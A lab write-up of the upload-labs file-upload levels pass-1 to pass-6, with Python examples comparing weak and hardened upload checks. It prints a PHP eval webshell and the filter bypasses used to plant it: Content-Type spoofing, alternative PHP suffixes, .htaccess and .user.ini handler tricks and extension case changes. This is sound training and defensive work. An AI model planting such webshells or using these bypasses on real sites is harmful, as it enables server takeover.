upload (1-6)
2022-07-05 13:54:00 【Cwxh0125】
One-line webshell (一句话木马)
<?php @eval($_POST['x']);?>
Basic principle: exploit a file upload vulnerability to put this one-liner on the target site; you can then browse and control the whole web directory from your own machine through China Chopper (中国菜刀) or AntSword (蚁剑).
Analysis:
<?php ?> is the basic PHP tag frame.
The @ symbol suppresses errors: even if the execution fails, PHP prints no warning.
Why the password is x:
PHP has several superglobal variables; $_GET and $_POST are two of them. $_POST['a'] means "receive the variable a via the POST method".
What eval does:
eval() executes a string as PHP code.
For example, eval("echo 'a';"); is equivalent to writing echo 'a'; directly.
Now look again at <?php eval($_POST['pw']); ?>. First the variable pw is received via POST. If, for instance, pw=echo 'a'; is received, the code becomes <?php eval("echo 'a';"); ?>. Taken together it means: receive the variable pw via POST and execute the string in pw as PHP code. In other words, whatever code you want to run, put it in the variable pw and POST it to the one-line webshell.
After a successful upload you can connect with AntSword or China Chopper.
pass-1

Looking at the page source, the check is done in front-end JavaScript, so simply disable JS in the browser.

With JS disabled, upload the webshell file directly.

Send x=phpinfo() (it prints the PHP configuration) to confirm the shell executes.

pass-2
The second level checks on the back end, so the previous method no longer works; you need Burp to intercept the request and change the file's Content-Type.
Content-Type, also called the Internet media type or MIME type, is a header in the HTTP protocol that indicates the media type of the specific request.
For example: text/html is HTML; image/gif is a GIF image; image/png is a PNG image; application/octet-stream is a binary stream of unknown type (what a .php upload gets); application/json is JSON. (source: training PPT)

Intercept the upload request

Change the Content-Type of the file part (e.g. to image/png)

Forward the request

Upload successful
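The following is an added example, not code from the original post: a Python model of what the pass-2 check decides, next to a hardened version. build_multipart() produces the same kind of body Burp lets you edit, with the file part's Content-Type chosen independently of the bytes inside; pass2_check() mirrors the page's description of the level (only the client-supplied Content-Type is inspected), while hardened_check() ignores that header and looks at the extension and the file's magic bytes. The helper names, the field name upload_file and the sample file contents are my own.

```python
# Added example (not code from the original post): a Python model of the
# pass-2 check. The server only looks at the Content-Type the client sent for
# the file part, which Burp can rewrite; a hardened check looks at the file
# body and the extension instead. Helper names are my own.
import uuid

PHP_SHELL = b"<?php @eval($_POST['x']);?>"   # constructed sample upload body
PNG_MAGIC = b"\x89PNG\r\n\x1a\n"
MAGIC_BY_EXT = {".png": PNG_MAGIC, ".gif": b"GIF8",
                ".jpg": b"\xff\xd8\xff", ".jpeg": b"\xff\xd8\xff"}
ALLOWED_MIME = {"image/jpeg", "image/png", "image/gif"}


def build_multipart(field, filename, content_type, data, boundary=None):
    """Build a multipart/form-data body with one file part.

    content_type is whatever the client claims; nothing ties it to data.
    Returns (body, value for the request's Content-Type header).
    """
    boundary = boundary or uuid.uuid4().hex
    b = boundary.encode()
    body = (
        b"--" + b + b"\r\n"
        + b'Content-Disposition: form-data; name="' + field.encode()
        + b'"; filename="' + filename.encode() + b'"\r\n'
        + b"Content-Type: " + content_type.encode() + b"\r\n\r\n"
        + data + b"\r\n--" + b + b"--\r\n"
    )
    return body, "multipart/form-data; boundary=" + boundary


def parse_multipart(body, boundary):
    """Minimal parser for bodies produced by build_multipart(); returns a list
    of dicts with the filename, the claimed content_type and the raw data."""
    delim = b"--" + boundary.encode()
    parts = []
    for chunk in body.split(delim)[1:]:
        if chunk.startswith(b"--"):
            break                                    # closing delimiter
        # chunk[2:] drops the CRLF that follows the delimiter line
        head, _, data = chunk[2:].partition(b"\r\n\r\n")
        headers = {}
        for line in head.split(b"\r\n"):
            k, _, v = line.decode("latin-1").partition(":")
            headers[k.strip().lower()] = v.strip()
        disp = headers.get("content-disposition", "")
        filename = ""
        if 'filename="' in disp:
            filename = disp.split('filename="', 1)[1].split('"', 1)[0]
        parts.append({"filename": filename,
                      "content_type": headers.get("content-type", ""),
                      "data": data[:-2]})            # drop CRLF before next delimiter
    return parts


def ext_of(filename):
    i = filename.rfind(".")
    return filename[i:].lower() if i >= 0 else ""


def pass2_check(part):
    """pass-2 as the page describes it: trust the client's Content-Type."""
    return part["content_type"] in ALLOWED_MIME


def hardened_check(part):
    """Whitelist the extension and require matching magic bytes; the client's
    Content-Type is not consulted at all."""
    magic = MAGIC_BY_EXT.get(ext_of(part["filename"]))
    return magic is not None and part["data"].startswith(magic)


def upload(filename, claimed_type, data):
    """Round-trip one upload through the multipart encoding, as the server sees it."""
    body, header = build_multipart("upload_file", filename, claimed_type, data,
                                   boundary="c0ffee")
    boundary = header.split("boundary=", 1)[1]
    return parse_multipart(body, boundary)[0]


if __name__ == "__main__":
    spoofed = upload("shell.php", "image/png", PHP_SHELL)   # what Burp produces after the edit
    real = upload("photo.png", "image/png", PNG_MAGIC + b"\0" * 16)
    print("pass-2 accepts spoofed shell:", pass2_check(spoofed))
    print("hardened accepts spoofed shell:", hardened_check(spoofed))
    print("hardened accepts real png:", hardened_check(real))
```

The point of the round trip is that the server never receives anything that binds the Content-Type header to the bytes of the file; it is just another field the client fills in. Checking magic bytes is only half of a fix: a real PNG with PHP appended still passes hardened_check(), so the extension whitelist and renaming the file on save (rather than keeping the client's name) are what stop it from ever being executed.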

pass-3
Blacklist bypass

Uploading files with suffixes such as .asp or .php is refused, but the blacklist is incomplete, so you can use an unusual suffix: php1, php2, php3, php4, php5, php7, pht, phtml, phar, phps, Asp, aspx, cer, cdx, asa, asax, jsp, jspa, jspx, etc.
Change the suffix to .php3

Prerequisite: Apache's httpd.conf maps these suffixes to the PHP handler, e.g. AddType application/x-httpd-php .pht .phtml .phps .php5 .pht. Only suffixes that actually appear in that AddType line are parsed as PHP, so check that the one you pick (.php3 here) is in the list before relying on it.


pass-4
Here the unusual suffixes are all forbidden.
But you can upload a .htaccess file containing SetHandler application/x-httpd-php,
which makes Apache parse every file in that directory as PHP, whatever its name (this only works if AllowOverride is enabled for the directory; otherwise Apache ignores the .htaccess).

After uploading .htaccess, change the webshell's suffix to .jpg and upload it; it succeeds.

pass-5
Look at the source.
Not only the unusual suffixes but .htaccess is blocked as well.


So none of the methods above work. The source gives a hint:

You can use a .user.ini file instead.
user.ini: since PHP 5.3.0, PHP supports .htaccess-style INI files on a per-directory basis. Such files are only handled by the CGI/FastCGI SAPI. This feature makes the PECL htscanner extension obsolete. If you are using Apache, .htaccess files give the same effect.
In addition to the main php.ini, PHP also scans for INI files in every directory, starting from the directory of the executed PHP file and going up to the web root ($_SERVER['DOCUMENT_ROOT']). If the executed PHP file is outside the web root, only its own directory is scanned.
In .user.ini-style INI files, only settings with PHP_INI_PERDIR and PHP_INI_USER mode are recognized.
Two INI directives, user_ini.filename and user_ini.cache_ttl, control the use of user INI files.
user_ini.filename sets the file name PHP looks for in each directory; if set to an empty string, PHP does not scan at all. The default is .user.ini.
user_ini.cache_ttl controls how often user INI files are re-read. The default is 300 seconds (5 minutes).
———————— Baidu
php.ini is PHP's configuration file, and the fields in .user.ini are treated by PHP as configuration in the same way; that is what makes the PHP file-inclusion trick possible.
So first create a .user.ini file.

The .user.ini file means: every PHP file in that directory automatically includes 721.jpg first (.user.ini is effectively a user-defined php.ini).
Then upload the 721.jpg file with the content: <?php @eval($_POST['x721']);?>
The upload succeeds. Note that the setting only takes effect when a .php file in the same directory is requested, under CGI/FastCGI, and possibly only after the user_ini.cache_ttl window (5 minutes by default) has passed.
pass-6
View the source.
Compared with the previous level, .ini is now blocked too, but the strtolower() function is not used, so you can bypass the blacklist with letter case.

Change the file suffix to .Php and upload. This works because Apache's mod_mime matches extensions case-insensitively, so .Php is still handed to the PHP handler even though the blacklist compared it literally.
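The following is an added example, not the level source code from the original post: a Python model of the blacklist decisions in pass-3 to pass-6 as the page describes them (an incomplete suffix list, then .htaccess, then .user.ini, then a case-sensitive comparison), run over the filenames the page uploads, next to a whitelist check that generates the stored name itself. The HTACCESS and USER_INI constants are the payload contents for pass-4 and pass-5; the page shows the .user.ini only as a screenshot, and auto_prepend_file is the standard directive that makes every PHP file in the directory include 721.jpg before running. The level names, the candidate filenames and the assumption that pass-3 to pass-5 lower-case the extension (the page singles out pass-6 as the level without strtolower()) are my own.

```python
# Added example (not the upload-labs source): a Python model of the
# server-side blacklist decisions in pass-3 to pass-6 as the page describes
# them, next to a whitelist check. Level names, candidate filenames and the
# assumption that pass-3 to pass-5 lower-case the extension are my own.
import secrets

# Payloads the page uploads. The .user.ini directive is the standard one that
# makes every PHP file in the directory include 721.jpg before running.
HTACCESS = "SetHandler application/x-httpd-php\n"   # pass-4: everything here is parsed as PHP
USER_INI = "auto_prepend_file=721.jpg\n"           # pass-5: prepend 721.jpg to every .php here

PASS3_DENY = {".asp", ".aspx", ".php", ".jsp"}
PASS4_DENY = PASS3_DENY | {".php1", ".php2", ".php3", ".php4", ".php5", ".php7",
                           ".pht", ".phtml", ".phar", ".phps", ".cer", ".cdx",
                           ".asa", ".asax", ".jspa", ".jspx"}
PASS5_DENY = PASS4_DENY | {".htaccess"}
PASS6_DENY = PASS5_DENY | {".ini"}

# (blacklist, whether strtolower() is applied); the page singles out pass-6
# as the level without strtolower(), the others are assumed to use it.
LEVELS = {
    "pass-3": (PASS3_DENY, True),
    "pass-4": (PASS4_DENY, True),
    "pass-5": (PASS5_DENY, True),
    "pass-6": (PASS6_DENY, False),
}

# The files the page tries, in order; note ".user.ini" has the extension ".ini".
CANDIDATES = ["shell.php", "shell.php3", ".htaccess", ".user.ini", "shell.Php"]


def ext_of(filename):
    """Everything from the last dot on, '' if there is none."""
    i = filename.rfind(".")
    return filename[i:] if i >= 0 else ""


def blacklist_accepts(level, filename):
    """True if the level's blacklist lets filename through."""
    deny, lowers = LEVELS[level]
    ext = ext_of(filename)
    if lowers:
        ext = ext.lower()
    return ext not in deny


def bypasses(level):
    """Candidate filenames the given level accepts."""
    return [n for n in CANDIDATES if blacklist_accepts(level, n)]


ALLOWED = {".jpg", ".jpeg", ".png", ".gif"}


def whitelist_name(filename):
    """Hardened counterpart: accept only a whitelisted (lower-cased) extension
    and discard the client's name, so case tricks, alternative PHP suffixes
    and dotfiles like .htaccess never reach the upload directory."""
    ext = ext_of(filename).lower()
    if ext not in ALLOWED:
        return None
    return secrets.token_hex(8) + ext


if __name__ == "__main__":
    for level in LEVELS:
        print(level, "accepts:", bypasses(level))
    print("whitelist accepts:", [n for n in CANDIDATES if whitelist_name(n)])
```

Each bypass the model reports still depends on the server side the page mentions: .php3 needs to be in Apache's AddType line, .htaccess needs AllowOverride, .user.ini needs the CGI/FastCGI SAPI and a .php file in the upload directory to trigger it, and .Php relies on mod_mime's case-insensitive extension match. The whitelist version removes all four at once because the stored name is never chosen by the client.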
